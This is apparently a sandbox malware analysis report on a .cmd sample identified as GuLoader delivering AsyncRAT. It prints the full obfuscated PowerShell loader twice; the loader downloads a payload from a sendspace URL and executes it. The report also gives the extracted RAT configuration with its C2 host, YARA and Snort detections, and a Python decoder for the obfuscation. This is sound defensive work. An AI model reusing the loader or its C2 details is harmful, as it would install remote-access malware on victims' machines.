
Windows Analysis Report
xff.cmd

Overview

General Information

Sample name: xff.cmd
Analysis ID: 1446776
MD5: ae6a3a8912f6dd675542cc40cb5c6088
SHA1: ba9cf3a09d51ab5f090fc9dac6f1253321c922e4
SHA256: cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808
Tags: cmd

Detection

AsyncRAT, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5700 cmdline: powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. 
N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes 
adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4976 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4324 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. 
N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes 
adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3940 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) (MD5 differs from the cmd.exe of PIDs 5728 and 4976: the parent is the SysWOW64 PowerShell, so the system32 path is subject to WoW64 file-system redirection and the 32-bit cmd.exe runs)
        • wab.exe (PID: 5892 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89) (the AsyncRAT Yara hits and the extracted configuration below come from this process's memory, dump id 0000000A.*)
  • cleanup
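Every string the PowerShell stage (PIDs 5700 and 4324 above) needs is rebuilt at runtime by the Ugedagens function: $Rasophore is assembled as 'Sub'+'strin'+'g' so that `.$Rasophore.Invoke($i, 1)` is a disguised Substring call, and the loop reads one character at index 5, 11, 17, ... of each literal, i.e. every sixth character, stopping before the literal's last character. The decoder below is an added example written for this page, not code from Joe Sandbox or from the sample. The four literals it decodes ($Fluernes, $Huaco, $adenoncus, $Astrographer) are copied from the command line above; SAMPLE_CMDLINE is a snippet constructed from them, and the multiple-of-6 length check is a heuristic drawn from those four literals, not a property the report states.

```python
"""Decoder for the sample's 'Ugedagens' string obfuscation.

Added example for this report page; not code from Joe Sandbox or from the
sample.  The PowerShell routine in the command line (variable names
shortened here) is:

    $Rasophore='Sub'; $Rasophore+='strin'; $Rasophore+='g'   # -> "Substring"
    Function Ugedagens($Outdure){
        $Frys=$Outdure.Length-1;
        For($i=5; $i -lt $Frys; $i+=6){ $out+=$Outdure.$Rasophore.Invoke($i,1) }
        $out
    }

Every 6-character chunk of a literal is five junk characters followed by one
real character, and the literal's final character is never read.
"""
import re
from typing import List, Optional, Tuple

# Literals copied verbatim from the powershell.exe command line in the report.
FLUERNES = "Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st "
HUACO = " Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap "
ADENONCUS = "Afmnsi ExhoeSv,nfxInku. "
ASTROGRAPHER = "Homol>Fossi "

# Constructed snippet in the sample's own syntax: the assignment form and the
# bare "Semuljegrynets (Ugedagens '...')" call form, built from the literals above.
SAMPLE_CMDLINE = (
    "$Huaco=Ugedagens '" + HUACO + "';"
    "$Fluernes=Ugedagens '" + FLUERNES + "';"
    "$Astrographer=Ugedagens '" + ASTROGRAPHER + "';"
    "$adenoncus=Ugedagens '" + ADENONCUS + "';"
    "Semuljegrynets (Ugedagens '" + ASTROGRAPHER + "');"
)

CHUNK = 6   # step between payload characters ($Interproducing += 6)
FIRST = 5   # index of the first payload character ($Interproducing = 5)


def ugedagens(blob: str) -> str:
    """Python equivalent of the sample's Ugedagens: Substring(i, 1) for
    i = 5, 11, 17, ... while i < len(blob) - 1."""
    return "".join(blob[i] for i in range(FIRST, len(blob) - 1, CHUNK))


def is_well_formed(blob: str) -> bool:
    """Heuristic (assumption drawn from the four literals above): each literal is
    an exact multiple of 6 characters, 5 junk + 1 payload per chunk plus a
    trailing junk chunk.  A remainder usually means whitespace was lost when the
    command line was copied, e.g. from a rendering that collapses runs of
    spaces; every character after the gap then decodes shifted."""
    return len(blob) % CHUNK == 0


# Matches  $Name=Ugedagens '...'  as well as the bare  Ugedagens '...'  call form.
_CALL_RE = re.compile(r"(?:\$(\w+)\s*=\s*)?Ugedagens\s+'([^']*)'")


def decode_script(cmdline: str) -> List[Tuple[Optional[str], str, bool]]:
    """Decode every Ugedagens literal in a command line, in script order.
    Returns (variable name or None for a bare call, decoded text, well-formed flag)."""
    return [
        (name or None, ugedagens(lit), is_well_formed(lit))
        for name, lit in _CALL_RE.findall(cmdline)
    ]


if __name__ == "__main__":
    for name, text, ok in decode_script(SAMPLE_CMDLINE):
        print(f"{name or '<call>':14} {'ok ' if ok else 'BAD'} {text!r}")
```

$Fluernes decodes to the first sendspace URL requested in the Networking section, $Huaco to the User-Agent header name, and $adenoncus to `iex`, which Semuljegrynets dot-sources to execute each decoded fragment. The well-formed flag matters when pasting literals from this page: its rendering appears to have collapsed runs of spaces in some of the longer strings (the $Omskrivelses literal as shown decodes to "echo B..." where the child cmd.exe of PID 4976 shows `echo %appdata%\Bevogtes140.Out`), so a literal whose length is not a multiple of 6 should be re-copied from the raw command line rather than trusted.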
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through an encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides keylogging, remote desktop control, and many other functions that may harm the victim's computer. AsyncRAT can be delivered via spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/stealers such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Server": "dhhj.duckdns.org", "Port": "8797", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "null"}
Source | Rule | Description | Author | Strings
dump.pcap | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xb0698:$x1: AsyncRAT
  • 0xb06d6:$x1: AsyncRAT
0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xc137:$x1: AsyncRAT
  • 0xc175:$x1: AsyncRAT
  • 0xc643:$x1: AsyncRAT
  • 0xc681:$x1: AsyncRAT
0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x2b54f:$x1: AsyncRAT
  • 0x2b58d:$x1: AsyncRAT
0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x2d323:$x1: AsyncRAT
  • 0x2d361:$x1: AsyncRAT
00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_5700.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_4324.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0xe05b:$b2: ::FromBase64String(
        • 0xd140:$s1: -join
        • 0x68ec:$s4: +=
        • 0x69ae:$s4: +=
        • 0xabd5:$s4: +=
        • 0xccf2:$s4: +=
        • 0xcfdc:$s4: +=
        • 0xd122:$s4: +=
        • 0x16a20:$s4: +=
        • 0x16aa0:$s4: +=
        • 0x16b66:$s4: +=
        • 0x16be6:$s4: +=
        • 0x16dbc:$s4: +=
        • 0x16e40:$s4: +=
        • 0xd900:$e4: Get-WmiObject
        • 0xdaef:$e4: Get-Process
        • 0xdb47:$e4: Start-Process
        • 0x15531:$e4: Get-Process

        System Summary

        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);} ... (the report truncates the Sigma match data; the complete command line is the PID 5700 powershell.exe entry in the process tree above)
        Snort IDS alerts:
        Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
        05/23/24-21:03:56.699407 | 2035595 | 8797 | 49711 | TCP | A Network Trojan was detected
        05/23/24-21:03:56.699407 | 2030673 | 8797 | 49711 | TCP | A Network Trojan was detected


        AV Detection

        Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (caveat: this URL is found in powershell.exe memory alongside https://github.com/Pester/Pester and the Apache 2.0 license URL, the manifest URIs of the Pester module that ships with Windows PowerShell, and it is never resolved or requested in the captured traffic; treat it as a benign module string, not as infrastructure of this sample)
        Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "dhhj.duckdns.org", "Port": "8797", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "null"}
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
        Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49708 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{ source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp
